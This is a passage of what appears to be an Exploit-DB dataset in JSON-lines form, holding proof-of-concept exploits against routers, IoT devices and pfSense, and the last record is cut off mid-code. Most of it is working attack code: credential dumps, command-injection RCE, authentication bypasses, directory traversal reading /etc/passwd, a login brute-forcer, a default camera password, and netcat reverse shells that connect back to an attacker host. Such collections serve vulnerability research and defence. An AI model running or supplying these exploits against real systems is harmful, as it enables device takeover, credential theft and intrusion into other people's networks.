CVE-2022-32429\n\n#!/usr/bin/python3\n\n\n\"\"\"\n\nPOC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.\n\nConfiguration dump only requires HTTP access.\nFull RCE requires you to be on the same subnet as the device.\n\n\"\"\"\n\nimport requests\nimport sys\nimport urllib.parse\nimport readline\nimport random\nimport string\n\n\n# listen with \"ncat -lk {LISTENER_PORT}\" on LISTENER_HOST\nLISTENER_HOST = \"192.168.EDIT.ME\"\nLISTENER_PORT = 3434\n\n# target msnswitch\nTARGET=\"192.168.EDIT.ME2\"\nPORT=80\n\nUSERNAME = None\nPASSWORD = None\n\n\"\"\"\nFirst vulnerability, unauthenticated configuration/credential dump\n\"\"\"\nif USERNAME == None or PASSWORD == None:\n\t# lets just ask\n\thack_url=f\"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh\"\n\tsession = requests.session()\n\n\tdata = session.get(hack_url)\n\tfor each in data.text.split('\\n'):\n\t\tkey = None\n\t\tval = None\n\n\t\ttry:\n\t\t\tkey = each.strip().split('=')[0]\n\t\t\tval = each.strip().split('=')[1]\n\t\texcept:\n\t\t\tpass\n\n\t\tif key == \"Account1\":\n\t\t\tUSERNAME = val\n\t\tif key == \"Password1\":\n\t\t\tPASSWORD = val\n\n\"\"\"\nSecond vulnerability, authenticated command execution\n\nThis only works on the local lan.\n\nfor full reverse shell, modify and upload netcat busybox shell script to /tmp:\n\n\tshell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f\n\tdownload to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp\n\nref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox\n\"\"\"\n\nsession = requests.session()\n\n# initial login, establishes our Cookie\nburp0_url = f\"http://{TARGET}:{PORT}/goform/login\"\nburp0_headers = {\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"Origin\": f\"http://{TARGET}\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Referer\": \"http://192.168.120.17/login.asp\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\nburp0_data = {\"login\": \"1\", \"user\": USERNAME, \"password\": PASSWORD}\nsession.post(burp0_url, headers=burp0_headers, data=burp0_data)\n\n# get our csrftoken\nburp0_url = f\"http://{TARGET}:{PORT}/saveUpgrade.asp\"\ndata = session.get(burp0_url)\n\ncsrftoken = data.text.split(\"?csrftoken=\")[1].split(\"\\\"\")[0]\n\nwhile True:\n\tCMD = input('x:')\n\tCMD_u = urllib.parse.quote_plus(CMD)\n\tfilename = ''.join(random.choice(string.ascii_letters) for _ in range(25))\n\n\ttry:\n\t\thack_url = f\"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}\"\n\n\t\tsession.get(hack_url, timeout=0.01)\n\texcept requests.exceptions.ReadTimeout:\n\t\tpass", "cve_id": "CVE-2022-32429", "source": "exploitdb", "timestamp": "2022-11-11T00:00:00+00:00"} {"id": "d960c246d57e3a130297", "text": "Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)\n\n# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio=\nn (RCE) (Authenticated)\n# Date: 19/10/2022\n# Exploit Author: Yerodin Richards\n# Vendor Homepage: https://www.nexxtsolutions.com/\n# Version: 42.103.1.5095\n# Tested on: ARN02304U8\n# CVE : CVE-2022-44149\n\nimport requests\nimport base64\n\nrouter_host =3D \"http://192.168.1.1\"\nusername =3D \"admin\"\npassword =3D \"admin\"\n\n\ndef main():\n send_payload(\"&telnetd\")\n print(\"connect to router using: `telnet \"+router_host.split(\"//\")[1]+ \"=\n` using known credentials\")\n pass\n\ndef gen_header(u, p):\n return base64.b64encode(f\"{u}:{p}\".encode(\"ascii\")).decode(\"ascii\")\n\ndef get_cookie(header):\n url =3D router_host+\"/login\"\n params =3D {\"arg\":header, \"_n\":1}\n resp=3Drequests.get(url, params=3Dparams)\n =20\ndef send_payload(payload):\n url =3D router_host+\"/goform/sysTools\"\n headers =3D {\"Authorization\": \"Basic {}\".format(gen_header(username, pa=\nssword))}\n params =3D {\"tool\":\"0\", \"pingCount\":\"4\", \"host\": payload, \"sumbit\": \"OK=\n\"}\n requests.post(url, headers=3Dheaders, data=3Dparams)\n\n\nif __name__ =3D=3D '__main__':\n main()", "cve_id": "CVE-2022-44149", "source": "exploitdb", "timestamp": "2023-04-01T00:00:00+00:00"} {"id": "69d93561b4ad084b0bc9", "text": "Nokia ASIKA 7.13.52 - Hard-coded private key disclosure\n\n// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure\n// Date: 2023-06-20\n// Exploit Author: Amirhossein Bahramizadeh\n// Category : Hardware\n// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/\n// Version: 7.13.52 (REQUIRED)\n// Tested on: Windows/Linux\n// CVE : CVE-2023-25187\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n// The IP address of the vulnerable device\nchar *host = \"192.168.1.1\";\n\n// The default SSH port number\nint port = 22;\n\n// The username and password for the BTS service user account\nchar *username = \"service_user\";\nchar *password = \"password123\";\n\n// The IP address of the attacker's machine\nchar *attacker_ip = \"10.0.0.1\";\n\n// The port number to use for the MITM attack\nint attacker_port = 2222;\n\n// The maximum length of a message\n#define MAX_LEN 1024\n\n// Forward data between two sockets\nvoid forward_data(int sock1, int sock2)\n{\n char buffer[MAX_LEN];\n ssize_t bytes_read;\n\n while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)\n {\n write(sock2, buffer, bytes_read);\n }\n}\n\nint main()\n{\n int sock, pid1, pid2;\n struct sockaddr_in addr;\n char *argv[] = {\"/usr/bin/ssh\", \"-l\", username, \"-p\", \"2222\", \"-o\", \"StrictHostKeyChecking=no\", \"-o\", \"UserKnownHostsFile=/dev/null\", \"-o\", \"PasswordAuthentication=no\", \"-o\", \"PubkeyAuthentication=yes\", \"-i\", \"/path/to/private/key\", \"-N\", \"-R\", \"2222:localhost:22\", host, NULL};\n\n // Create a new socket\n sock = socket(AF_INET, SOCK_STREAM, 0);\n\n // Set the address to connect to\n memset(&addr, 0, sizeof(addr));\n addr.sin_family = AF_INET;\n addr.sin_port = htons(port);\n inet_pton(AF_INET, host, &addr.sin_addr);\n\n // Connect to the vulnerable device\n if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)\n {\n fprintf(stderr, \"Error connecting to %s:%d: %s\\n\", host, port, strerror(errno));\n exit(1);\n }\n\n // Send the SSH handshake\n write(sock, \"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\\r\\n\", 42);\n read(sock, NULL, 0);\n\n // Send the username\n write(sock, username, strlen(username));\n write(sock, \"\\r\\n\", 2);\n read(sock, NULL, 0);\n\n // Send the password\n write(sock, password, strlen(password));\n write(sock, \"\\r\\n\", 2);\n\n // Wait for the authentication to complete\n sleep(1);\n\n // Start an SSH client on the attacker's machine\n pid1 = fork();\n if (pid1 == 0)\n {\n execv(\"/usr/bin/ssh\", argv);\n exit(0);\n }\n\n // Start an SSH server on the attacker's machine\n pid2 = fork();\n if (pid2 == 0)\n {\n execl(\"/usr/sbin/sshd\", \"/usr/sbin/sshd\", \"-p\", \"2222\", \"-o\", \"StrictModes=no\", \"-o\", \"PasswordAuthentication=no\", \"-o\", \"PubkeyAuthentication=yes\", \"-o\", \"AuthorizedKeysFile=/dev/null\", \"-o\", \"HostKey=/path/to/private/key\", NULL);\n exit(0);\n }\n\n // Wait for the SSH server to start\n sleep(1);\n\n // Forward data between the client and the server\n pid1 = fork();\n if (pid1 == 0)\n {\n forward_data(sock, STDIN_FILENO);\n exit(0);\n }\n pid2 = fork();\n if (pid2 == 0)\n {\n forward_data(STDOUT_FILENO, sock);\n exit(0);\n }\n\n // Wait for the child processes to finish\n waitpid(pid1, NULL, 0);\n waitpid(pid2, NULL, 0);\n\n // Close the socket\n close(sock);\n\n return 0;\n}", "cve_id": "CVE-2023-25187", "source": "exploitdb", "timestamp": "2023-06-20T00:00:00+00:00"} {"id": "eb15fab9ebd3b984674f", "text": "Optoma 1080PSTX Firmware C02 - Authentication Bypass\n\n# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass\n# Date: 2023/05/09\n# Exploit Author: Anthony Cole\n# Contact: http://twitter.com/acole76\n# Website: http://twitter.com/acole76\n# Vendor Homepage: http://optoma.com\n# Version: Optoma 1080PSTX Firmware C02\n# Tested on: N/A\n# CVE : CVE-2023-27823\n\nDetails\nBy default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the \"atop\" cookie to the value of \"1\".\n\nGET /index.asp HTTP/1.1\nHost: projector\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: atop=1\nConnection: close", "cve_id": "CVE-2023-27823", "source": "exploitdb", "timestamp": "2023-05-23T00:00:00+00:00"} {"id": "a92048cff3d6c91b191e", "text": "pfsenseCE v2.6.0 - Anti-brute force protection bypass\n\n#!/usr/bin/python3\n\n## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass\n## Google Dork: intitle:\"pfSense - Login\"\n## Date: 2023-04-07\n## Exploit Author: FabDotNET (Fabien MAISONNETTE)\n## Vendor Homepage: https://www.pfsense.org/\n## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz\n## Version: pfSenseCE <= 2.6.0\n## CVE: CVE-2023-27100\n\n# Vulnerability\n## CVE: CVE-2023-27100\n## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100\n## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc\n## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66\n\nimport requests\nimport sys\nimport re\nimport argparse\nimport textwrap\nfrom urllib3.exceptions import InsecureRequestWarning\n\n# Expected Arguments\nparser = argparse.ArgumentParser(description=\"pfsenseCE <= 2.6.0 Anti-brute force protection bypass\",\n formatter_class=argparse.RawTextHelpFormatter,\n epilog=textwrap.dedent('''\nExploit Usage :\n./CVE-2023-27100.py -l http:/// -u user.txt -p pass.txt\n./CVE-2023-27100.py -l http:/// -u /Directory/user.txt -p /Directory/pass.txt'''))\n\nparser.add_argument(\"-l\", \"--url\", help=\"pfSense WebServer (Example: http://127.0.0.1/)\")\nparser.add_argument(\"-u\", \"--usersList\", help=\"Username Dictionary\")\nparser.add_argument(\"-p\", \"--passwdList\", help=\"Password Dictionary\")\nargs = parser.parse_args()\n\nif len(sys.argv) < 2:\n print(f\"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]\")\n sys.exit(1)\n\n# Variable\nurl = args.url\nusersList = args.usersList\npasswdList = args.passwdList\n\n# Suppress only the single warning from urllib3 needed.\nif url.upper().startswith(\"HTTPS://\"):\n requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\nprint('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')\n\n\ndef login(userlogin, userpasswd):\n session = requests.session()\n r = session.get(url, verify=False)\n\n # Getting CSRF token value\n csrftoken = re.search(r'input type=\\'hidden\\' name=\\'__csrf_magic\\' value=\"(.*?)\"', r.text)\n csrftoken = csrftoken.group(1)\n\n # Specifying Headers Value\n headerscontent = {\n 'User-Agent': 'Mozilla/5.0',\n 'Referer': f\"{url}\",\n 'X-Forwarded-For': '42.42.42.42'\n }\n\n # POST REQ data\n postreqcontent = {\n '__csrf_magic': f\"{csrftoken}\",\n 'usernamefld': f\"{userlogin}\",\n 'passwordfld': f\"{userpasswd}\",\n 'login': 'Sign+In'\n }\n\n # Sending POST REQ\n r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)\n\n # Conditional loops\n if r.status_code != 200:\n print(f'[*] - Found Valid Credential !!')\n print(f\"[*] - Use this Credential -> {userlogin}:{userpasswd}\")\n sys.exit(0)\n\n\n# Reading User.txt & Pass.txt files\nuserfile = open(usersList).readlines()\npassfile = open(passwdList).readlines()\n\nfor user in userfile:\n user = user.strip()\n for passwd in passfile:\n passwd = passwd.strip()\n login(user, passwd)", "cve_id": "CVE-2023-27100", "source": "exploitdb", "timestamp": "2023-04-08T00:00:00+00:00"} {"id": "907d6514f2be424cffa9", "text": "Shelly PRO 4PM v0.11.0 - Authentication Bypass\n\n#!/bin/bash\n\n# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass\n# Google Dork: NA\n# Date: 2nd August 2023\n# Exploit Author: The Security Team [exploitsecurity.io]\n# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability\n# Vendor Homepage: https://www.shelly.com/\n# Software Link: NA\n# Version: Firmware v0.11.0 (REQUIRED)\n# Tested on: MacOS/Linux\n# CVE : CVE-2023-33383\n\nIFS=\nfailed=$false\nRED=\"\\e[31m\"\nGREEN=\"\\e[92m\"\nWHITE=\"\\e[97m\"\nENDCOLOR=\"\\e[0m\"\nsubstring=\"Connection refused\"\n\n\nbanner()\n {\n clear\n echo -e \"${GREEN}[+]*********************************************************[+]\"\n echo -e \"${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |\"\n echo -e \"${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |\"\n echo -e \"${GREEN}| CVE: CVE-2023-33383 |\"\n echo -e \"${GREEN}[+]*********************************************************[+]\"\n echo -e \"${GREEN}[Enter key to send payload]${ENDCOLOR}\"\n }\n\nbanner\nread -s -n 1 key\nif [ \"$key\" = \"x\" ]; then\n exit 0;\nelif [ \"$key\" = \"\" ]; then\n gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)\n if [ -z \"$gattout\" ]; then\n echo -e \"${RED}Connection timed out${ENDCOLOR}\"\n exit 0;\n else\n sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1\n echo -ne \"${GREEN}[Sending Payload]${ENDCOLOR}\"\n sleep 1\n if [ $? -eq 1 ]; then\n $failed=$true\n exit 0;\n fi\n sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1\n sleep 1\n if [ $? -eq 1 ]; then\n $failed=$true\n echo -e \"${RED}[**Exploit Failed**]${ENDCOLOR}\"\n exit 0;\n else\n sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1\n sleep 1\n for i in {1..5}\n do\n echo -ne \"${GREEN}.\"\n sleep 1\n done\n echo -e \"\\n${WHITE}[Pwned!]${ENDCOLOR}\"\n fi\nfi\nfi", "cve_id": "CVE-2023-33383", "source": "exploitdb", "timestamp": "2023-08-04T00:00:00+00:00"} {"id": "f10aa4d2feb7622242de", "text": "SmartRG Router SR510n 2.6.13 - Remote Code Execution\n\n# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)\n# Date: 13/06/2022\n# Exploit Author: Yerodin Richards\n# Vendor Homepage: https://adtran.com\n# Version: 2.5.15 / 2.6.13 (confirmed)\n# Tested on: SR506n (2.5.15) & SR510n (2.6.13)\n# CVE : CVE-2022-37661\n\nimport requests\nfrom subprocess import Popen, PIPE\n\nrouter_host =3D \"http://192.168.1.1\"\nauthorization_header =3D \"YWRtaW46QWRtMW5ATDFtMyM=3D\"\n\nlhost =3D \"lo\"\nlport =3D 80\n\npayload_port =3D 81\n\n\ndef main():\n e_proc =3D Popen([\"echo\", f\"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=\np/s | nc {lhost} {lport} > /tmp/s\"], stdout=3DPIPE)\n Popen([\"nc\", \"-nlvp\", f\"{payload_port}\"], stdin=3De_proc.stdout)\n send_payload(f\"|nc {lhost} {payload_port}|sh\")\n print(\"done.. check shell\")\n\n\ndef get_session():\n url =3D router_host + \"/admin/ping.html\"\n headers =3D {\"Authorization\": \"Basic {}\".format(authorization_header)}\n r =3D requests.get(url, headers=3Dheaders).text\n i =3D r.find(\"&sessionKey=3D\") + len(\"&sessionKey=3D\")\n s =3D \"\"\n while r[i] !=3D \"'\":\n s =3D s + r[i]\n i =3D i + 1\n return s\n\n\ndef send_payload(payload):\n print(payload)\n url =3D router_host + \"/admin/pingHost.cmd\"\n headers =3D {\"Authorization\": \"Basic {}\".format(authorization_header)}\n params =3D {\"action\": \"add\", \"targetHostAddress\": payload, \"sessionKey\"=\n: get_session()}\n requests.get(url, headers=3Dheaders, params=3Dparams).text\n\n\nmain()", "cve_id": "CVE-2022-37661", "source": "exploitdb", "timestamp": "2022-11-11T00:00:00+00:00"} {"id": "b314ee743b23b47da17c", "text": "SolarView Compact 6.0 - OS Command Injection\n\n# Exploit Title: SolarView Compact 6.0 - OS Command Injection\n# Date: 2022-05-15\n# Exploit Author: Ahmed Alroky\n# Author Company : AIactive\n# Version: ver.6.00\n# Vendor home page : https://www.contec.com/\n# Authentication Required: No\n# CVE : CVE-2022-29303\n# Tested on: Windows\n\n# Exploit\n# HTTP Request :\nPOST /conf_mail.php HTTP/1.1\nHost: HOST_IP\nContent-Length: 77\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://HOST_IP\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://HOST_IP/conf_mail.php\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nmail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M", "cve_id": "CVE-2022-29303", "source": "exploitdb", "timestamp": "2022-05-17T00:00:00+00:00"} {"id": "6ff2ef5aa5f9b2d9dca0", "text": "SolarView Compact 6.00 - Command Injection\n\n#- Exploit Title: SolarView Compact 6.00 - Command Injection\n#- Shodan Dork: http.html:\"solarview compact\"\n#- Exploit Author: ByteHunter\n#- Email: 0xByteHunter@proton.me\n#- Version: 6.00\n#- Tested on: 6.00\n#- CVE : CVE-2023-23333\n\n\nimport argparse\nimport requests\n\ndef vuln_check(ip_address, port):\n url = f\"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip\"\n response = requests.get(url)\n if response.status_code == 200:\n output = response.text\n if \"root\" in output:\n print(\"Vulnerability detected: Command Injection possible.\")\n print(f\"passwd file content:\\n{response.text}\")\n\n\n else:\n print(\"No vulnerability detected.\")\n else:\n print(\"Error: Unable to fetch response.\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\"SolarView Compact Command Injection \")\n parser.add_argument(\"-i\", \"--ip\", help=\"IP address of the target device\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Port of the the target device (default: 80)\", default=80, type=int)\n args = parser.parse_args()\n\n ip_address = args.ip\n port = args.port\n vuln_check(ip_address, port)\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2023-23333", "source": "exploitdb", "timestamp": "2024-03-14T00:00:00+00:00"} {"id": "eff77ff67dad9e62d4fa", "text": "SolarView Compact 6.00 - Directory Traversal\n\n# Exploit Title: SolarView Compact 6.00 - Directory Traversal\n# Date: 2022-05-15\n# Exploit Author: Ahmed Alroky\n# Author Company : Aiactive\n# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/\n# Version: ver.6.00\n# Vendor home page : https://www.contec.com/\n# Authentication Required: No\n# CVE : CVE-2022-29298\n\n# Tested on: Windows\n\n# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg", "cve_id": "CVE-2022-29298", "source": "exploitdb", "timestamp": "2022-06-03T00:00:00+00:00"} {"id": "b38c99430ab22a39aa3d", "text": "Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access\n\n# Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access\n# Date: 19th July 2022\n# Exploit Author: dsclee1\n# Vendor Homepage: tp-link.com\n# Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin\n# Version: 1.3.0\n# Tested on: Linux – running on camera\n# CVE : CVE-2022-37255\n\nThese Tapo cameras work via an app. There is a facility on the app to set up a “Camera Account”, which adds user details for the RTSP server. Unfortunately if you don’t set up the user details on versions 1.3.0 and below there are default login details. I sourced these from the “cet” binary on the camera.\n\nYou can gain unauthorised access to the RTSP stream using the following user details:\n\nUser: ---\n\nPassword: TPL075526460603", "cve_id": "CVE-2022-37255", "source": "exploitdb", "timestamp": "2023-03-28T00:00:00+00:00"} {"id": "aea0c129f65998651bba", "text": "Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities\n\n# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities\n# Google Dork: N/A\n# Date: 25/08/2023\n# Exploit Author: The Security Team [exploitsecurity.io]\n# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570\n# Software Link: N/A\n# Version: 1.0.19_T53\n# Tested on: MACOS/Linux\n# CVE : CVE-2023-34723\n# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725\n\n#!/opt/homebrew/bin/python3\n\nimport requests\nimport sys\nfrom time import sleep\nfrom urllib3.exceptions import InsecureRequestWarning\nfrom colorama import init\nfrom colorama import Fore, Back, Style\nimport re\nimport os\nimport ipaddress\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\ndef banner():\n if os.name == 'posix':\n clr_cmd = ('clear')\n elif os.name == 'nt':\n clr_cmd = ('cls')\n os.system(clr_cmd)\n print (\"[+]****************************************************[+]\")\n print (\" | Author : The Security Team |\")\n print (\" | Company : \"+Fore.RED+ \"Exploit Security\" +Style.RESET_ALL+\"\\t\\t\\t|\")\n print (\" | Description : TechVIEW LA-5570 Directory Traversal |\")\n print (\" | Usage : \"+sys.argv[0]+\" |\")\n print (\"[+]****************************************************[+]\")\n\ndef usage():\n print (f\"Usage: {sys.argv[0]} \")\n\ndef main(target):\n domain = \"http://\"+target+\"/config/system.conf\"\n try:\n url = domain.strip()\n r = requests.get(url, verify=False, timeout=3)\n print (\"[+] Retrieving credentials\", flush=True, end='')\n sleep(1)\n print(\" .\", flush=True, end='')\n sleep(1)\n print(\" .\", flush=True, end='')\n sleep(1)\n print(\" .\", flush=True, end='')\n if (\"system_password\" in r.text):\n data = (r.text.split(\"\\n\"))\n print (f\"\\n{data[1]}\")\n else:\n print (Fore.RED + \"[!] Target is not vulnerable !\"+ Style.RESET_ALL)\n except TimeoutError:\n print (Fore.RED + \"[!] Timeout connecting to target !\"+ Style.RESET_ALL)\n except KeyboardInterrupt:\n return\n except requests.exceptions.Timeout:\n print (Fore.RED + \"[!] Timeout connecting to target !\"+ Style.RESET_ALL)\n return\n\nif __name__ == '__main__':\n if len(sys.argv)>1:\n banner()\n target = sys.argv[1]\n try:\n validate = ipaddress.ip_address(target)\n if (validate):\n main (target)\n except ValueError as e:\n print (Fore.RED + \"[!] \" + str(e) + \" !\" + Style.RESET_ALL)\n else:\n print (Fore.RED + f\"[+] Not enough arguments, please specify target !\" + Style.RESET_ALL)", "cve_id": "CVE-2023-34723", "source": "exploitdb", "timestamp": "2023-09-08T00:00:00+00:00"} {"id": "f7b954ff0857ea76e957", "text": "TP-Link Archer AX21 - Unauthenticated Command Injection\n\n#!/usr/bin/python3\n#\n# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection\n# Date: 07/25/2023\n# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)\n# Vendor Homepage: https://www.tp-link.com/us/\n# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)\n# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0\n# CVE: CVE-2023-1389\n#\n# Disclaimer: This script is intended to be used for educational purposes only.\n# Do not run this against any system that you do not have permission to test.\n# The author will not be held responsible for any use or damage caused by this\n# program.\n#\n# CVE-2023-1389 is an unauthenticated command injection vulnerability in the web\n# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the\n# *country* parameter of the *write* callback for the *country* form at the\n# \"/cgi-bin/luci/;stok=/locale\" endpoint. By modifying the country parameter it is\n# possible to run commands as root. Execution requires sending the request twice;\n# the first request sets the command in the *country* value, and the second request\n# (which can be identical or not) executes it.\n#\n# This script is a short proof of concept to obtain a reverse shell. To read more\n# about the development of this script, you can read the blog post here:\n# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94\n# Before running the script, start a nc listener on your preferred port -> run the script -> profit\n\nimport requests, urllib.parse, argparse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n# Suppress warning for connecting to a router with a self-signed certificate\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n# Take user input for the router IP, and attacker IP and port\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-r\", \"--router\", dest = \"router\", default = \"192.168.0.1\", help=\"Router name\")\nparser.add_argument(\"-a\", \"--attacker\", dest = \"attacker\", default = \"127.0.0.1\", help=\"Attacker IP\")\nparser.add_argument(\"-p\", \"--port\",dest = \"port\", default = \"9999\", help=\"Local port\")\n\nargs = parser.parse_args()\n\n# Generate the reverse shell command with the attacker IP and port\nrevshell = urllib.parse.quote(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc \" + args.attacker + \" \" + args.port + \" >/tmp/f\")\n\n# URL to obtain the reverse shell\nurl_command = \"https://\" + args.router + \"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(\" + revshell + \")\"\n\n# Send the URL twice to run the command. Sending twice is necessary for the attack\nr = requests.get(url_command, verify=False)\nr = requests.get(url_command, verify=False)", "cve_id": "CVE-2023-1389", "source": "exploitdb", "timestamp": "2023-08-10T00:00:00+00:00"} {"id": "db9ac5710d48e61dd315", "text": "TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)\n\n# Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)\n# Exploit Author: Tomas Melicher\n# Technical Details: https://github.com/aaronsvk/CVE-2022-30075\n# Date: 2022-06-08\n# Vendor Homepage: https://www.tp-link.com/\n# Tested On: Tp-Link Archer AX50\n# Vulnerability Description: Remote Code Execution via importing malicious config file\n# CVE: CVE-2022-30075\n\n#!/usr/bin/python3\n\nimport argparse # pip install argparse\nimport requests # pip install requests\nimport binascii, base64, os, re, json, sys, time, math, random, hashlib\nimport tarfile, zlib\nfrom Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.Padding import pad, unpad\nfrom Crypto.Random import get_random_bytes\nfrom urllib.parse import urlencode\n\nclass WebClient(object):\n\n\tdef __init__(self, target, password):\n\t\tself.target = target\n\t\tself.password = password.encode('utf-8')\n\t\tself.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')\n\t\tself.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')\n\t\tself.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')\n\n\t\tself.stok = ''\n\t\tself.session = requests.Session()\n\n\t\tdata = self.basic_request('/login?form=auth', {'operation':'read'})\n\t\tif data['success'] != True:\n\t\t\tprint('[!] unsupported router')\n\t\t\treturn\n\t\tself.sign_rsa_n = int(data['data']['key'][0], 16)\n\t\tself.sign_rsa_e = int(data['data']['key'][1], 16)\n\t\tself.seq = data['data']['seq']\n\n\t\tdata = self.basic_request('/login?form=keys', {'operation':'read'})\n\t\tself.password_rsa_n = int(data['data']['password'][0], 16)\n\t\tself.password_rsa_e = int(data['data']['password'][1], 16)\n\n\t\tself.stok = self.login()\n\n\n\tdef aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):\n\t\tcipher = AES.new(aes_key, AES.MODE_CBC, 